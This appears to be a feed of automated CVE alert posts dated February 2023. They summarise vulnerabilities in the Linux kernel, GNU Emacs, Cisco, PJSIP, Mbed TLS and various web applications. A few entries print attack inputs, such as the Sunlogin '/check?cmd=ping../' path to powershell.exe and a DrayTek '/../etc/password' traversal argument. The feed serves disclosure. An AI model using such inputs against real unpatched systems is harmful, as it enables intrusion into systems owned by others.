| 2023-02-24 20:29:59 |
🚨 CVE-2018-10901A flaw was found in Linux kernel's KVM virtualization subsystem. The VMX code does not restore the GDT.LIMIT to the previous host value, but instead sets it to 64KB. With a corrupted GDT limit a host's userspace code has an ability to place malicious entries in the GDT, particularly to the per-cpu variables. An attacker can use this to escalate their privileges.🎖@cveNotify |
|
| 2023-02-24 20:29:58 |
🚨 CVE-2019-11487The Linux kernel before 5.1-rc5 allows page->_refcount reference count overflow, with resultant use-after-free issues, if about 140 GiB of RAM exists. This is related to fs/fuse/dev.c, fs/pipe.c, fs/splice.c, include/linux/mm.h, include/linux/pipe_fs_i.h, kernel/trace/trace.c, mm/gup.c, and mm/hugetlb.c. It can occur with FUSE requests.🎖@cveNotify |
|
| 2023-02-24 20:29:57 |
🚨 CVE-2018-10675The do_get_mempolicy function in mm/mempolicy.c in the Linux kernel before 4.12.9 allows local users to cause a denial of service (use-after-free) or possibly have unspecified other impact via crafted system calls.🎖@cveNotify |
|
| 2023-02-24 20:29:55 |
🚨 CVE-2021-29154BPF JIT compilers in the Linux kernel through 5.11.12 have incorrect computation of branch displacements, allowing them to execute arbitrary code within the kernel context. This affects arch/x86/net/bpf_jit_comp.c and arch/x86/net/bpf_jit_comp32.c.🎖@cveNotify |
|
| 2023-02-24 17:29:58 |
🚨 CVE-2021-35370An issue found in Peacexie Imcat v5.4 allows attackers to execute arbitrary code via the incomplete filtering function.🎖@cveNotify |
|
| 2023-02-24 17:29:57 |
🚨 CVE-2023-23205An issue was discovered in lib60870 v2.3.2. There is a memory leak in lib60870/lib60870-C/examples/multi_client_server/multi_client_server.c.🎖@cveNotify |
|
| 2023-02-24 17:29:56 |
🚨 CVE-2023-25153containerd is an open source container runtime. Before versions 1.6.18 and 1.5.18, when importing an OCI image, there was no limit on the number of bytes read for certain files. A maliciously crafted image with a large file where a limit was not applied could cause a denial of service. This bug has been fixed in containerd 1.6.18 and 1.5.18. Users should update to these versions to resolve the issue. As a workaround, ensure that only trusted images are used and that only trusted users have permissions to import images.🎖@cveNotify |
|
| 2023-02-24 17:29:55 |
🚨 CVE-2023-0103If an attacker were to access memory locations of LS ELECTRIC XBC-DN32U with operating system version 01.80 that are outside of the communication buffer, the device stops operating. This could allow an attacker to cause a denial-of-service condition.🎖@cveNotify |
|
| 2023-02-24 17:29:54 |
🚨 CVE-2023-0102LS ELECTRIC XBC-DN32U with operating system version 01.80 is missing authentication for its deletion command. This could allow an attacker to delete arbitrary files.🎖@cveNotify |
|
| 2023-02-24 17:29:53 |
🚨 CVE-2022-45587Stack overflow vulnerability in function gmalloc in goo/gmem.cc in xpdf 4.04, allows local attackers to cause a denial of service.🎖@cveNotify |
|
| 2023-02-24 17:29:52 |
🚨 CVE-2023-23752An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.🎖@cveNotify |
|
| 2023-02-24 17:29:51 |
🚨 CVE-2023-25578Starlite is an Asynchronous Server Gateway Interface (ASGI) framework. Prior to version 1.5.2, the request body parsing in `starlite` allows a potentially unauthenticated attacker to consume a large amount of CPU time and RAM. The multipart body parser processes an unlimited number of file parts and an unlimited number of field parts. This is a remote, potentially unauthenticated Denial of Service vulnerability. This vulnerability affects applications with a request handler that accepts a `Body(media_type=RequestEncodingType.MULTI_PART)`. The large amount of CPU time required for processing requests can block all available worker processes and significantly delay or slow down the processing of legitimate user requests. The large amount of RAM accumulated while processing requests can lead to Out-Of-Memory kills. Complete DoS is achievable by sending many concurrent multipart requests in a loop. Version 1.51.2 contains a patch for this issue.🎖@cveNotify |
|
| 2023-02-24 17:29:50 |
🚨 CVE-2021-37137The Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk.🎖@cveNotify |
|
| 2023-02-24 17:29:48 |
🚨 CVE-2022-48337GNU Emacs through 28.2 allows attackers to execute commands via shell metacharacters in the name of a source-code file, because lib-src/etags.c uses the system C library function in its implementation of the etags program. For example, a victim may use the "etags -u *" command (suggested in the etags documentation) in a situation where the current working directory has contents that depend on untrusted input.🎖@cveNotify |
|
| 2023-02-24 17:29:47 |
🚨 CVE-2022-48338An issue was discovered in GNU Emacs through 28.2. In ruby-mode.el, the ruby-find-library-file function has a local command injection vulnerability. The ruby-find-library-file function is an interactive function, and bound to C-c C-f. Inside the function, the external command gem is called through shell-command-to-string, but the feature-name parameters are not escaped. Thus, malicious Ruby source files may cause commands to be executed.🎖@cveNotify |
|
| 2023-02-24 17:29:46 |
🚨 CVE-2022-48339An issue was discovered in GNU Emacs through 28.2. htmlfontify.el has a command injection vulnerability. In the hfy-istext-command function, the parameter file and parameter srcdir come from external input, and parameters are not escaped. If a file name or directory name contains shell metacharacters, code may be executed.🎖@cveNotify |
|
| 2023-02-24 17:29:45 |
🚨 CVE-2021-35576Vulnerability in the Oracle Database Enterprise Edition Unified Audit component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1 and 19c. Easily exploitable vulnerability allows high privileged attacker having Local Logon privilege with network access via Oracle Net to compromise Oracle Database Enterprise Edition Unified Audit. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Database Enterprise Edition Unified Audit accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-02-24 17:29:44 |
🚨 CVE-2022-43460Driver Distributor v2.2.3.1 and earlier contains a vulnerability where passwords are stored in a recoverable format. If an attacker obtains a configuration file of Driver Distributor, the encrypted administrator's credentials may be decrypted.🎖@cveNotify |
|
| 2023-02-24 17:29:43 |
🚨 CVE-2022-48323Sunlogin Sunflower Simplified (aka Sunflower Simple and Personal) 1.0.1.43315 is vulnerable to a path traversal issue. A remote and unauthenticated attacker can execute arbitrary programs on the victim host by sending a crafted HTTP request, as demonstrated by /check?cmd=ping../ followed by the pathname of the powershell.exe program.🎖@cveNotify |
|
| 2023-02-24 17:29:42 |
🚨 CVE-2022-42455ASUS EC Tool driver (aka d.sys) 1beb15c90dcf7a5234ed077833a0a3e900969b60be1d04fcebce0a9f8994bdbb, as signed by ASUS and shipped with multiple ASUS software products, contains multiple IOCTL handlers that provide raw read and write access to port I/O and MSRs via unprivileged IOCTL calls. Local users can gain privileges.🎖@cveNotify |
|
| 2023-02-24 17:29:41 |
🚨 CVE-2023-24499Butterfly Button plugin may leave traces of its use on user's device. Since it is used for reporting domestic problems, this may lead to spouse knowing about its use.🎖@cveNotify |
|
| 2023-02-24 17:29:40 |
🚨 CVE-2020-23685SQL Injection vulnerability in 188Jianzhan v2.1.0, allows attackers to execute arbitrary code and gain escalated privileges, via the username parameter to login.php.🎖@cveNotify |
|
| 2023-02-24 17:29:39 |
🚨 CVE-2021-43396** DISPUTED ** In iconvdata/iso-2022-jp-3.c in the GNU C Library (aka glibc) 2.34, remote attackers can force iconv() to emit a spurious '\0' character via crafted ISO-2022-JP-3 data that is accompanied by an internal state reset. This may affect data integrity in certain iconv() use cases. NOTE: the vendor states "the bug cannot be invoked through user input and requires iconv to be invoked with a NULL inbuf, which ought to require a separate application bug to do so unintentionally. Hence there's no security impact to the bug."🎖@cveNotify |
|
| 2023-02-24 17:29:38 |
🚨 CVE-2023-23463Sunell DVR, latest version, Insufficiently Protected Credentials (CWE-522) may be exposed through an unspecified request.🎖@cveNotify |
|
| 2023-02-24 15:30:08 |
🚨 CVE-2021-45486In the IPv4 implementation in the Linux kernel before 5.12.4, net/ipv4/route.c has an information leak because the hash table is very small.🎖@cveNotify |
|
| 2023-02-24 15:30:06 |
🚨 CVE-2021-3752A use-after-free flaw was found in the Linux kernel’s Bluetooth subsystem in the way user calls connect to the socket and disconnect simultaneously due to a race condition. This flaw allows a user to crash the system or escalate their privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.🎖@cveNotify |
|
| 2023-02-24 15:30:05 |
🚨 CVE-2021-3773A flaw in netfilter could allow a network-connected attacker to infer openvpn connection endpoint information for further use in traditional network attacks.🎖@cveNotify |
|
| 2023-02-24 15:30:03 |
🚨 CVE-2022-0564A vulnerability in Qlik Sense Enterprise on Windows could allow an remote attacker to enumerate domain user accounts. An attacker could exploit this vulnerability by sending authentication requests to an affected system. A successful exploit could allow the attacker to compare the response time that are returned by the affected system to determine which accounts are valid user accounts. Affected systems are only vulnerable if they have LDAP configured.🎖@cveNotify |
|
| 2023-02-24 15:30:02 |
🚨 CVE-2023-21691Microsoft Protected Extensible Authentication Protocol (PEAP) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-02-24 15:30:01 |
🚨 CVE-2022-42735Improper Privilege Management vulnerability in Apache Software Foundation Apache ShenYu. ShenYu Admin allows low-privilege low-level administrators create users with higher privileges than their own. This issue affects Apache ShenYu: 2.5.0. Upgrade to Apache ShenYu 2.5.1 or apply patch https://github.com/apache/shenyu/pull/3958 https://github.com/apache/shenyu/pull/3958 .🎖@cveNotify |
|
| 2023-02-24 15:30:00 |
🚨 CVE-2021-43946Affected versions of Atlassian Jira Server and Data Center allow authenticated remote attackers to add administrator groups to filter subscriptions via a Broken Access Control vulnerability in the /secure/EditSubscription.jspa endpoint. The affected versions are before version 8.13.21, and from version 8.14.0 before 8.20.9.🎖@cveNotify |
|
| 2023-02-24 15:29:59 |
🚨 CVE-2021-33963China Mobile An Lianbao WF-1 v1.0.1 router web interface through /api/ZRMacClone/mac_addr_clone receives parameters by POST request, and the parameter macType has a command injection vulnerability. An attacker can use the vulnerability to execute remote commands.🎖@cveNotify |
|
| 2023-02-24 15:29:58 |
🚨 CVE-2023-21690Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-02-24 15:29:54 |
🚨 CVE-2023-0595A CWE-117: Improper Output Neutralization for Logs vulnerability exists that could cause the misinterpretation of log files when malicious packets are sent to the Geo SCADA server's database web port (default 443). Affected products: EcoStruxure Geo SCADA Expert 2019, EcoStruxure Geo SCADA Expert 2020, EcoStruxure Geo SCADA Expert 2021(All Versions prior to October 2022), ClearSCADA (All Versions)🎖@cveNotify |
|
| 2023-02-24 15:29:53 |
🚨 CVE-2023-1007A vulnerability was found in Twister Antivirus 8.17. It has been declared as critical. This vulnerability affects unknown code in the library filmfd.sys of the component IoControlCode Handler. The manipulation leads to improper access controls. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221740.🎖@cveNotify |
|
| 2023-02-24 15:29:52 |
🚨 CVE-2023-1008A vulnerability was found in Twister Antivirus 8.17. It has been rated as problematic. This issue affects some unknown processing in the library filmfd.sys of the component IoControlCode Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier VDB-221741 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-24 15:29:51 |
🚨 CVE-2023-1009A vulnerability classified as problematic has been found in DrayTek Vigor 2960 1.5.1.4. Affected is the function sub_1DF14 of the file /cgi-bin/mainfunction.cgi. The manipulation of the argument option with the input /../etc/password leads to path traversal. The attack needs to be done within the local network. The exploit has been disclosed to the public and may be used. VDB-221742 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-24 15:29:50 |
🚨 CVE-2023-1010A vulnerability classified as critical was found in vox2png 1.0. Affected by this vulnerability is an unknown functionality of the file vox2png.c. The manipulation leads to heap-based buffer overflow. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221743.🎖@cveNotify |
|
| 2023-02-24 14:29:38 |
🚨 CVE-2023-0595A CWE-117: Improper Output Neutralization for Logs vulnerability exists that could cause the misinterpretation of log files when malicious packets are sent to the Geo SCADA server's database web port (default 443). Affected products: EcoStruxure Geo SCADA Expert 2019, EcoStruxure Geo SCADA Expert 2020, EcoStruxure Geo SCADA Expert 2021(All Versions prior to October 2022), ClearSCADA (All Versions)🎖@cveNotify |
|
| 2023-02-24 14:29:37 |
🚨 CVE-2023-1008A vulnerability was found in Twister Antivirus 8.17. It has been rated as problematic. This issue affects some unknown processing in the library filmfd.sys of the component IoControlCode Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier VDB-221741 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-24 14:29:36 |
🚨 CVE-2023-1010A vulnerability classified as critical was found in vox2png 1.0. Affected by this vulnerability is an unknown functionality of the file vox2png.c. The manipulation leads to heap-based buffer overflow. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221743.🎖@cveNotify |
|
| 2023-02-24 12:30:16 |
🚨 CVE-2023-0997A vulnerability was found in SourceCodester Moosikay E-Commerce System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /Moosikay/order.php of the component POST Parameter Handler. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221732.🎖@cveNotify |
|
| 2023-02-24 12:30:15 |
🚨 CVE-2023-0998A vulnerability classified as critical has been found in SourceCodester Alphaware Simple E-Commerce System 1.0. This affects an unknown part of the file /alphaware/summary.php of the component Payment Handler. The manipulation of the argument amount leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221733 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-24 12:30:12 |
🚨 CVE-2023-0999A vulnerability classified as problematic was found in SourceCodester Sales Tracker Management System 1.0. This vulnerability affects unknown code of the file admin/?page=user/list. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-221734 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-24 12:30:09 |
🚨 CVE-2023-1002A vulnerability, which was classified as problematic, has been found in MuYuCMS 2.2. This issue affects some unknown processing of the file index.php. The manipulation of the argument file_path leads to path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221735.🎖@cveNotify |
|
| 2023-02-24 12:30:05 |
🚨 CVE-2023-1004A vulnerability has been found in MarkText up to 0.17.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the component WSH JScript Handler. The manipulation leads to code injection. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-221737 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-24 12:30:03 |
🚨 CVE-2022-34397Dell Unisphere for PowerMax vApp, VASA Provider vApp, and Solution Enabler vApp version 10.0.0.5 and below contains an authorization bypass vulnerability, allowing users to perform actions in which they are not authorized.🎖@cveNotify |
|
| 2023-02-24 12:30:01 |
🚨 CVE-2022-25937Versions of the package glance before 3.0.9 are vulnerable to Directory Traversal that allows users to read files outside the public root directory. This is related to but distinct from the vulnerability reported in [CVE-2018-3715](https://security.snyk.io/vuln/npm:glance:20180129).🎖@cveNotify |
|
| 2023-02-24 12:29:58 |
🚨 CVE-2021-40555Cross site scripting (XSS) vulnerability in flatCore-CMS 2.2.15 allows attackers to execute arbitrary code via description field on the new page creation form.🎖@cveNotify |
|
| 2023-02-24 12:29:56 |
🚨 CVE-2023-22367Ichiran App for iOS versions prior to 3.1.0 and Ichiran App for Android versions prior to 3.1.0 improperly verify server certificates, which may allow a remote unauthenticated attacker to eavesdrop on an encrypted communication via a man-in-the-middle attack.🎖@cveNotify |
|
| 2023-02-24 12:29:54 |
🚨 CVE-2020-36661A vulnerability was found in Kong lua-multipart 0.5.8-1. It has been declared as problematic. This vulnerability affects the function is_header of the file src/multipart.lua. The manipulation leads to inefficient regular expression complexity. Upgrading to version 0.5.9-1 is able to address this issue. The name of the patch is d632e5df43a2928fd537784a99a79dec288bf01b. It is recommended to upgrade the affected component. VDB-220642 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-24 12:29:51 |
🚨 CVE-2019-25103A vulnerability has been found in simple-markdown 0.5.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file simple-markdown.js. The manipulation leads to inefficient regular expression complexity. The attack can be launched remotely. Upgrading to version 0.5.2 is able to address this issue. The name of the patch is 89797fef9abb4cab2fb76a335968266a92588816. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220639.🎖@cveNotify |
|
| 2023-02-24 12:29:49 |
🚨 CVE-2023-0793Weak Password Requirements in GitHub repository thorsten/phpmyfaq prior to 3.1.11.🎖@cveNotify |
|
| 2023-02-24 12:29:47 |
🚨 CVE-2023-0790Uncaught Exception in GitHub repository thorsten/phpmyfaq prior to 3.1.11.🎖@cveNotify |
|
| 2023-02-24 12:29:46 |
🚨 CVE-2023-25152Wings is Pterodactyl's server control plane. Affected versions are subject to a vulnerability which can be used to create new files and directory structures on the host system that previously did not exist, potentially allowing attackers to change their resource allocations, promote their containers to privileged mode, or potentially add ssh authorized keys to allow the attacker access to a remote shell on the target machine. In order to use this exploit, an attacker must have an existing "server" allocated and controlled by the Wings Daemon. This vulnerability has been resolved in version `v1.11.3` of the Wings Daemon, and has been back-ported to the 1.7 release series in `v1.7.3`. Anyone running `v1.11.x` should upgrade to `v1.11.3` and anyone running `v1.7.x` should upgrade to `v1.7.3`. There are no known workarounds for this vulnerability. ### Workarounds None at this time.🎖@cveNotify |
|
| 2023-02-24 12:29:44 |
🚨 CVE-2023-0792Code Injection in GitHub repository thorsten/phpmyfaq prior to 3.1.11.🎖@cveNotify |
|
| 2023-02-24 12:29:43 |
🚨 CVE-2022-48345sanitize-url (aka @braintree/sanitize-url) before 6.0.2 allows XSS via HTML entities.🎖@cveNotify |
|
| 2023-02-24 12:29:42 |
🚨 CVE-2023-22425Stored cross-site scripting vulnerability in Schedule function of SHIRASAGI v1.16.2 and earlier versions allows a remote authenticated attacker to inject an arbitrary script.🎖@cveNotify |
|
| 2023-02-24 12:29:39 |
🚨 CVE-2023-22427Stored cross-site scripting vulnerability in Theme switching function of SHIRASAGI v1.16.2 and earlier versions allows a remote attacker with an administrative privilege to inject an arbitrary script.🎖@cveNotify |
|
| 2023-02-24 12:29:38 |
🚨 CVE-2023-24576EMC NetWorker may potentially be vulnerable to an unauthenticated remote code execution vulnerability in the NetWorker Client execution service (nsrexecd) irrespective of any auth used.🎖@cveNotify |
|
| 2023-02-24 06:29:44 |
🚨 CVE-2022-1607Cross-Site Request Forgery (CSRF) vulnerability in ABB Pulsar Plus System Controller NE843_S, ABB Infinity DC Power Plant allows Cross Site Request Forgery.This issue affects Pulsar Plus System Controller NE843_S : comcode 150042936; Infinity DC Power Plant: H5692448 G104 G842 G224L G630-4 G451C(2) G461(2) – comcode 150047415.🎖@cveNotify |
|
| 2023-02-24 06:29:40 |
🚨 CVE-2023-26102All versions of the package rangy are vulnerable to Prototype Pollution when using the extend() function in file rangy-core.js.The function uses recursive merge which can lead an attacker to modify properties of the Object.prototype🎖@cveNotify |
|
| 2023-02-24 06:29:39 |
🚨 CVE-2023-0996There is a vulnerability in the strided image data parsing code in the emscripten wrapper for libheif. An attacker could exploit this through a crafted image file to cause a buffer overflow in linear memory during a memcpy call.🎖@cveNotify |
|
| 2023-02-24 06:29:38 |
🚨 CVE-2023-0995Cross-site Scripting (XSS) - Stored in GitHub repository unilogies/bumsys prior to v2.0.1.🎖@cveNotify |
|
| 2023-02-24 06:29:37 |
🚨 CVE-2022-46440ttftool v0.9.2 was discovered to contain a segmentation violation via the readU16 function at ttf.c.🎖@cveNotify |
|
| 2023-02-24 06:29:36 |
🚨 CVE-2023-0994Improper Access Control in GitHub repository francoisjacquet/rosariosis prior to 10.8.2.🎖@cveNotify |
|
| 2023-02-24 05:46:27 |
https://t.me/malwr |
|
| 2023-02-24 02:30:11 |
🚨 CVE-2022-42705A use-after-free in res_pjsip_pubsub.c in Sangoma Asterisk 16.28, 18.14, 19.6, and certified/18.9-cert2 may allow a remote authenticated attacker to crash Asterisk (denial of service) by performing activity on a subscription via a reliable transport at the same time that Asterisk is also performing activity on that subscription.🎖@cveNotify |
|
| 2023-02-24 02:30:10 |
🚨 CVE-2022-42706An issue was discovered in Sangoma Asterisk through 16.28, 17 and 18 through 18.14, 19 through 19.6, and certified through 18.9-cert1. GetConfig, via Asterisk Manager Interface, allows a connected application to access files outside of the asterisk configuration directory, aka Directory Traversal.🎖@cveNotify |
|
| 2023-02-24 02:30:08 |
🚨 CVE-2022-39269PJSIP is a free and open source multimedia communication library written in C. When processing certain packets, PJSIP may incorrectly switch from using SRTP media transport to using basic RTP upon SRTP restart, causing the media to be sent insecurely. The vulnerability impacts all PJSIP users that use SRTP. The patch is available as commit d2acb9a in the master branch of the project and will be included in version 2.13. Users are advised to manually patch or to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-02-24 02:30:07 |
🚨 CVE-2022-39244PJSIP is a free and open source multimedia communication library written in C. In versions of PJSIP prior to 2.13 the PJSIP parser, PJMEDIA RTP decoder, and PJMEDIA SDP parser are affeced by a buffer overflow vulnerability. Users connecting to untrusted clients are at risk. This issue has been patched and is available as commit c4d3498 in the master branch and will be included in releases 2.13 and later. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-02-24 02:30:06 |
🚨 CVE-2022-31031PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. In versions prior to and including 2.12.1 a stack buffer overflow vulnerability affects PJSIP users that use STUN in their applications, either by: setting a STUN server in their account/media config in PJSUA/PJSUA2 level, or directly using `pjlib-util/stun_simple` API. A patch is available in commit 450baca which should be included in the next release. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-02-24 02:30:05 |
🚨 CVE-2020-12278An issue was discovered in libgit2 before 0.28.4 and 0.9x before 0.99.0. path.c mishandles equivalent filenames that exist because of NTFS Alternate Data Streams. This may allow remote code execution when cloning a repository. This issue is similar to CVE-2019-1352.🎖@cveNotify |
|
| 2023-02-24 02:30:04 |
🚨 CVE-2020-12279An issue was discovered in libgit2 before 0.28.4 and 0.9x before 0.99.0. checkout.c mishandles equivalent filenames that exist because of NTFS short names. This may allow remote code execution when cloning a repository. This issue is similar to CVE-2019-1353.🎖@cveNotify |
|
| 2023-02-24 02:30:02 |
🚨 CVE-2018-1631IBM Informix Dynamic Server Enterprise Edition 12.1 could allow a local user logged in with database administrator user to gain root privileges through a symbolic link vulnerability in oninit mongohash. IBM X-Force ID: 144431.🎖@cveNotify |
|
| 2023-02-24 02:30:00 |
🚨 CVE-2018-1630IBM Informix Dynamic Server Enterprise Edition 12.1 could allow a local user logged in with database administrator user to gain root privileges through a symbolic link vulnerability in onmode. IBM X-Force ID: 144430.🎖@cveNotify |
|
| 2023-02-24 02:29:59 |
🚨 CVE-2021-24119In Trusted Firmware Mbed TLS 2.24.0, a side-channel vulnerability in base64 PEM file decoding allows system-level (administrator) attackers to obtain information about secret RSA keys via a controlled-channel and side-channel attack on software running in isolated environments that can be single stepped, especially Intel SGX.🎖@cveNotify |
|
| 2023-02-24 02:29:58 |
🚨 CVE-2020-10941Arm Mbed TLS before 2.16.5 allows attackers to obtain sensitive information (an RSA private key) by measuring cache usage during an import.🎖@cveNotify |
|
| 2023-02-24 02:29:57 |
🚨 CVE-2021-44732Mbed TLS before 3.0.1 has a double free in certain out-of-memory conditions, as demonstrated by an mbedtls_ssl_set_session() failure.🎖@cveNotify |
|
| 2023-02-24 02:29:56 |
🚨 CVE-2022-35268A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the `/action/import_sdk_file/` API.🎖@cveNotify |
|
| 2023-02-24 02:29:55 |
🚨 CVE-2022-35269A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the `/action/import_e2c_json_file/` API.🎖@cveNotify |
|
| 2023-02-24 02:29:54 |
🚨 CVE-2022-35270A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the `/action/import_wireguard_cert_file/` API.🎖@cveNotify |
|
| 2023-02-24 02:29:53 |
🚨 CVE-2022-35271A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the `/action/import_cert_file/` API.🎖@cveNotify |
|
| 2023-02-24 02:29:51 |
🚨 CVE-2021-31693VMware Tools for Windows (12.x.y prior to 12.1.5, 11.x.y and 10.x.y) contains a denial-of-service vulnerability in the VM3DMP driver. A malicious actor with local user privileges in the Windows guest OS, where VMware Tools is installed, can trigger a PANIC in the VM3DMP driver leading to a denial-of-service condition in the Windows guest OS.🎖@cveNotify |
|
| 2023-02-24 02:29:50 |
🚨 CVE-2022-42818This issue was addressed with improved data protection. This issue is fixed in macOS Ventura 13. A user in a privileged network position may be able to track user activity.🎖@cveNotify |
|
| 2023-02-24 02:29:49 |
🚨 CVE-2019-6110In OpenSSH 7.9, due to accepting and displaying arbitrary stderr output from the server, a malicious server (or Man-in-The-Middle attacker) can manipulate the client output, for example to use ANSI control codes to hide additional files being transferred.🎖@cveNotify |
|
| 2023-02-24 00:29:46 |
🚨 CVE-2023-26326The BuddyForms WordPress plugin, in versions prior to 2.7.8, was affected by an unauthenticated insecure deserialization issue. An unauthenticated attacker could leverage this issue to call files using a PHAR wrapper that will deserialize the data and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present.🎖@cveNotify |
|
| 2023-02-24 00:29:45 |
🚨 CVE-2023-20011A vulnerability in the web-based management interface of Cisco Application Policy Infrastructure Controller (APIC) and Cisco Cloud Network Controller, formerly Cisco Cloud APIC, could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. This vulnerability is due to insufficient CSRF protections for the web-based management interface on an affected system. An attacker could exploit this vulnerability by persuading a user of the interface to click a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user. If the affected user has administrative privileges, these actions could include modifying the system configuration and creating new privileged accounts.🎖@cveNotify |
|
| 2023-02-24 00:29:44 |
🚨 CVE-2022-46786SquaredUp Dashboard Server SCOM edition before 5.7.1 GA allows XSS (issue 2 of 2).🎖@cveNotify |
|
| 2023-02-24 00:29:43 |
🚨 CVE-2022-4492The undertow client is not checking the server identity presented by the server certificate in https connections. This is a compulsory step (at least it should be performed by default) in https and in http/2. I would add it to any TLS client protocol.🎖@cveNotify |
|
| 2023-02-24 00:29:42 |
🚨 CVE-2023-0044If the Quarkus Form Authentication session cookie Path attribute is set to `/` then a cross-site attack may be initiated which might lead to the Information Disclosure. This attack can be prevented with the Quarkus CSRF Prevention feature.🎖@cveNotify |
|
| 2023-02-24 00:29:41 |
🚨 CVE-2023-0597A flaw possibility of memory leak in the Linux kernel cpu_entry_area mapping of X86 CPU data to memory was found in the way user can guess location of exception stack(s) or other important data. A local user could use this flaw to get access to some important data with expected location in memory.🎖@cveNotify |
|
| 2023-02-24 00:29:40 |
🚨 CVE-2023-20015A vulnerability in the CLI of Cisco Firepower 4100 Series, Cisco Firepower 9300 Security Appliances, and Cisco UCS 6200, 6300, 6400, and 6500 Series Fabric Interconnects could allow an authenticated, local attacker to inject unauthorized commands. This vulnerability is due to insufficient input validation of commands supplied by the user. An attacker could exploit this vulnerability by authenticating to a device and submitting crafted input to the affected command. A successful exploit could allow the attacker to execute unauthorized commands within the CLI. An attacker with Administrator privileges could also execute arbitrary commands on the underlying operating system of Cisco UCS 6400 and 6500 Series Fabric Interconnects with root-level privileges.🎖@cveNotify |
|
| 2023-02-24 00:29:39 |
🚨 CVE-2023-20016A vulnerability in the backup configuration feature of Cisco UCS Manager Software and in the configuration export feature of Cisco FXOS Software could allow an unauthenticated attacker with access to a backup file to decrypt sensitive information stored in the full state and configuration backup files. This vulnerability is due to a weakness in the encryption method used for the backup function. An attacker could exploit this vulnerability by leveraging a static key used for the backup configuration feature. A successful exploit could allow the attacker to decrypt sensitive information that is stored in full state and configuration backup files, such as local user credentials, authentication server passwords, Simple Network Management Protocol (SNMP) community names, and other credentials.🎖@cveNotify |
|
| 2023-02-24 00:29:38 |
🚨 CVE-2023-20050A vulnerability in the CLI of Cisco NX-OS Software could allow an authenticated, local attacker to execute arbitrary commands on the underlying operating system of an affected device. This vulnerability is due to insufficient validation of arguments that are passed to specific CLI commands. An attacker could exploit this vulnerability by including crafted input as the argument of an affected command. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the currently logged-in user.🎖@cveNotify |
|
| 2023-02-24 00:29:37 |
🚨 CVE-2023-20089A vulnerability in the Link Layer Discovery Protocol (LLDP) feature for Cisco Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) Mode could allow an unauthenticated, adjacent attacker to cause a memory leak, which could result in an unexpected reload of the device. This vulnerability is due to incorrect error checking when parsing ingress LLDP packets. An attacker could exploit this vulnerability by sending a steady stream of crafted LLDP packets to an affected device. A successful exploit could allow the attacker to cause a memory leak, which could result in a denial of service (DoS) condition when the device unexpectedly reloads. Note: This vulnerability cannot be exploited by transit traffic through the device. The crafted LLDP packet must be targeted to a directly connected interface, and the attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent). In addition, the attack surface for this vulnerability can be reduced by disabling LLDP on interfaces where it is not required.🎖@cveNotify |
|
